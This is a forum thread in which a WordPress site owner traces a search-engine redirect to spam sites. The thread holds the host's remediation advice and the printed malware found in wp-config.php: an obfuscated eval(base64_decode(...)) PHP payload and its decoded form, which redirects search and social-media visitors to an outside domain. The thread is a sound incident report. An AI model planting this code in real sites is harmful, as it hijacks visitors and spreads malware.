Webpage being directed to SPAM

Hi guys,

I have an issue, but open closer inspection the issue might be a browser related.

I am not entirely sure what’s happening on my site, but I seam to get redirected from the site on Google to another site called “http://monkeyball.osa.pl/?said=3333g&q=corporate+identity+cyprus”. If you type Cyprus Corporate Identity you get my site near the top, it’s with a PricklyPear. From here, on my browser anyhow I get directed to this spam site. It was happening before when I set the site to Multisite.

Can anybody let me know why this is happening? I myself think it might be a browser related issue, maybe on outside machines something else happens.

I’ve just tried that using Yahoo! (because I wasn’t paying attention to what I was doing ) and your site came up top. Clicking on the link got me

Oops! Google Chrome could not find aruba.345.pl

345.pl and osa.pl both have very poor ratings on WOT; McAfee site advisor hasn’t ranked the first one, but about the second it says:

McAfee TrustedSource web reputation analysis found potential security risks with this site. Use with extreme caution.
I don’t know what’s going on, but it seems pretty safe to say it’s not an issue with your browser.

That makes things even worse! Can anybody assist me on this. I use Site5 as my host, I can probably flag the issue up with them, but maybe it would be good to see what people say here before I do anything.

OK - I tried again with Google and a different browser, and I got this:

I have no problem if I visit the site direct, so I don’t know what’s going on here.

Aruba is not my website though. This is another website. I am going to have to flag this up to the hosts. I have no idea whats going on.

Sorry - I meant I can visit pricklypear direct without any problems.

I know the site can be visited directly without any issue. I am on LIVE chat with the hosting company and seeing what they can do, if anything. I am really unsure what’s going on, it’s all very strange.

Strange - I’ve tried with several browsers and Google is sending me to pricklypear as it should do, nothing dodgy at all.

Something is up. Ran a search on Google and when visiting your homepage I get:

Warning: Something’s Not Right Here!
www3.bestscannerfyn.rr.nu contains malware. Your computer might catch a virus if you visit this site.
Google has found malicious software may be installed onto your computer if you proceed. If you’ve visited this site in the past or you trust this site, it’s possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.
We have already notified www3.bestscannerfyn.rr.nu that we found malware on the site. For more about the problems found on www3.bestscannerfyn.rr.nu, visit the Google Safe

The other pages I clicked are redirecting to something weird as well. What does the host say?

I’d say the site has been compromised.

Nothing at the moment. The lady opened a ticket to flag up to the Technical team, I am unsure what they will say. Aren’t hosts suppose to protect against this thing? I feel something is playing in the domain name. I did a virus scam and it checked all the files and they seamed to be okay, I am not sure what else to do. I am using WP as the site suggests. I use a CDN but I don’t think that’s doing anything bad.

The word in from the host.

[quote=““Site5 Hosting””]

Hello,

What is occurring, at least from my end while using firefox, is that the page is showing:

“Reported attack page”

This type of error will also be dependent on the browser being used.

The particular page in question (my URL) however appears to have been compromised and is redirecting to a 3rd party website, that then attempts to install a fake anti-virus.

As someone has reported the site to google, users who use firefox/google toolbar in Internet Explorer will get the message that the page has been reported as an attack page.

When this occurs, what usually occurs is that an individual website will get compromised by a 3rd party and a script will get modified. The script is then usually modified with a link to a 3rd party location where the virus/scamware is located and then when a viewer goes to your website the virus will be downloaded from the 3rd party location.

This usually occurs due to:

1. outdated / insecure scripts
2. scripts that are prone to “sql injections”
3. Insecure passwords, especially FTP passwords.
4. Installing plugins/extensions without verifying that they are legitimate. There exists some that are specifically designed to “take over” websites.

Most common types of scripts are:

1. Forums
2. Contact forms
3. Any kind of input forms
4. Blogs

What needs to be done:

1. Change any passwords you have. Make sure new passwords are at least 8 digits long and do not use any words found in the dictionary. Passwords should include at least 2 numbers, 2 digits, and be random.

2. Review any scripts you have for any content that you did not put in them.

3. If you have any backups of your site, you may need to restore to the backup. If you do not have a backup but the issue is less then 30 days old, we can restore from one of our backups. You can request a restore via https://backstage.site5.com/client/addons/backup_restore

While it impossible however for us to scan website code, due to the trillions of possible variations of code out there, for possible links to viruses that are hosted on other servers, we can run an audit on your account that will look for possible vulnerabilities such as outdated scripts or other common vulnerabilities. While this does not look for all possible vulnerabilities it does look for some common vulnerabilities.

NOTE: This needs to be done AFTER the site has been put into a pre-compromised state.

If you would like this performed, as it will involve revealing account specific information for security purposes please provide:

What is your favorite pet’s name?

4 first digits of your ID card

Once we have the above, we can then proceed.

Thanks,

Troy LaClaire
Support Specialist, Site5.com

[/quote]

The hosts are really amazing, they eventually found the issue and cause of the problem.

eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb 2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ=="));

was found on the top of the wp-config file.

This translates to:

error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER['HTTP_REFERER'];
$uag=$_SERVER['HTTP_USER_AGENT'];
if ($uag) {
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\\.ru\\/yandsearch\\?(.*?)\\&lr\\=/",$referer) or preg_match ("/google\\.(.*?)\\/url/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: [B]http://broadway.bee.pl/[/B]");
exit();

This made my website marked as SPAM! Apart from being listed on the top rank for Cyprus Corporate Identity I would be shunning business away with this spam. My host gave me excellent advice on keeping my WP installation and virus free. I feel this malicious code was part of an plug-in to do with social media.

I will think twice before I see any base code on my site!

I have found nothing on Google about this malicious code, so I hope this thread can be found by many to resolve an issue which took all day to resolve. Thanks again, and I am glad my site is now back to normal few

I just wanted to check and make sure this got resolved ok? Our support would be happy to help,

Thanks, Ben
Site5 CEO

The issue was resolved, they did a brilliant job. The actual issue was a line of code which created the redirect.

I did something else when putting the security plug-ins which caused another issue and now I can’t log onto the CMS. I will try to solve this, if push comes to shove I will probably recreate the blog since I have the backups. I really don’t want to ask your team to help again, they did an amazing job and it’s not fair for me to ask for their help on my inexperience.

Kind regards,

I’m glad to hear they could help! Don’t worry that is what we are for if you need help

Thanks, Ben

I just had a similar issue with one of my hosted customers but the issue didn’t stop at just the wp-config file. In fact, they injected this code into several dozen of my files scattered throughout.

The best way to identify the files that contain this code is to look at the timestamp or date of modification on each file containing the code snippet. Each file had exactly the same time and date, which made it obvious for me to see which files were modified to contain this injected script.

All the basic wordpress files I simply uploaded over again using a clean Wordpress install, but the wp-config and wp-content folders took some time to go through manually. They must have had some automated method of adding this to files because they were all at exactly the same time but also so many files were infected… I didn’t see any obvious areas, but this was injected into plugin and theme files without discrimination.

It’s a time consuming one to fix, but once you’re done… you are good to go. Hope this helps.

Since then I’ve done loads to prevent hacks. SSL certification all around, bulletproofing my WP installation. This might have been my website, but it would have been much worse if it was on a clients site. Relatively easy to setup.

@dr00t;

Your examples was far worse than mine, so I feel for you. What steps do you now take to prevent such a re occurrence.